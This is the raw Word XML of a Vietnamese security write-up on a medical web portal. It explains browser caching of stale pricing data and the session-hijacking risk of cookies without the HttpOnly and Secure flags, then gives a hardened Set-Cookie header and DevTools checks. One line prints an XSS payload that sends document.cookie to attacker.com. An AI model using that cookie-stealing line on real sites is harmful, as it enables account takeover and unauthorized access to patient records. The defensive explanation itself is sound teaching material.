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6F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Phần 1: Phân tích lỗ hổng &amp; nguyên nhân</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Nguyên nhân dữ liệu cũ (Browser Cache): Trình duyệt của bác sĩ đang lấy file pricing_data.json và medicine_catalog.css trực tiếp từ bộ nhớ cục bộ (disk cache / memory cache) mà không gửi HTTP Request về Server để kiểm tra cập nhật. Vì phản hồi trước đó có cơ chế caching (ví dụ cờ Cache-Control cho phép lưu cache), trình duyệt mặc định nạp lại bản sao đã lưu trong 2ms để tối ưu tốc độ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Nguy cơ an ninh (Session Hijacking):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Câu lệnh đánh cắp token: const token = document.cookie; (hoặc gửi token về server hacker qua fetch('[http://attacker.com/steal?cookie=](http://attacker.com/steal?cookie=)' + document.cookie)).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Hiểm họa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Thiếu HttpOnly: Cho phép mã độc XSS truy cập thẳng vào document.cookie để lấy token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Thiếu Secure: Token bị gửi dưới dạng văn bản rõ (plaintext) qua kết nối HTTP không mã hóa, dẫn đến nguy cơ bị nghe lén trên mạng (Man-in-the-Middle).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Hậu quả: Hacker chiếm quyền tài khoản bác sĩ, xem/sửa hồ sơ bệnh án trái phép hoặc kê đơn thuốc giả mạo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Phần 2: Hoàn thiện giải pháp &amp; Thao tác DevTools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Thao tác Hard Reload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Bác sĩ nhấn tổ hợp phím Ctrl + Shift + R (trên Windows/Linux) hoặc Cmd + Shift + R (trên macOS) để cưỡng bức trình duyệt bỏ qua cache và tải lại dữ liệu mới nhất từ Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Dòng lệnh Set-Cookie chuẩn an ninh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94">
      <w:pPr>
        <w:spacing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HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326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Set-Cookie: carepulse_doctor_session=TOKEN_XYZ883921983; Domain=carepulse.vn; Path=/; Expires=Wed, 21 Oct 2026 07:00:00 GMT; Secure; HttpOnly; SameSite=Strict</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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3 Bước kiểm tra trên Chrome DevTools (F12):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Nhấn F12, chọn tab Application $\rightarrow$ mở mục Cookies $\rightarrow$ chọn [https://carepulse.vn](https://carepulse.vn) để kiểm tra cờ HttpOnly và Secure đã có dấu tích xanh ($\checkmark$) hay chưa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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Chọn tab Network, tích chọn ô Disable cache (chỉ có hiệu lực khi DevTools đang mở) để vô hiệu hóa cache tạm thời.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F94" w:rsidRPr="00326F94" w:rsidRDefault="00326F94" w:rsidP="00326F94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26F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Nhấn F5 để nạp lại trang, quan sát cột Size trong tab Network đảm bảo hiển thị dung lượng thực (byte/KB) chứ không còn (from disk cache).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360606" w:rsidRPr="00326F94" w:rsidRDefault="00360606">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00360606" w:rsidRPr="00326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13BC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA28E4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116EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B086A3A4"/>
    <w:lvl w:ilvl="0" w:tplc="5B4E39B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827C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F47F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7EA6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41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3827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AAA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0A55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26C2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00F58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="85AA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334887">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1577978899">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="169974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94"/>
    <w:rsid w:val="00241D15"/>
    <w:rsid w:val="00326F94"/>
    <w:rsid w:val="00360606"/>
    <w:rsid w:val="009D4A77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724B3E7-ECC2-BA4A-8788-6C16BBED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6F9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6F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6F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6F94"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ng-tns-c3351656037-30">
    <w:name w:val="ng-tns-c3351656037-30"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00326F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F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ath-inline">
    <w:name w:val="math-inline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00326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2026-10-26T01:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-26T02:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>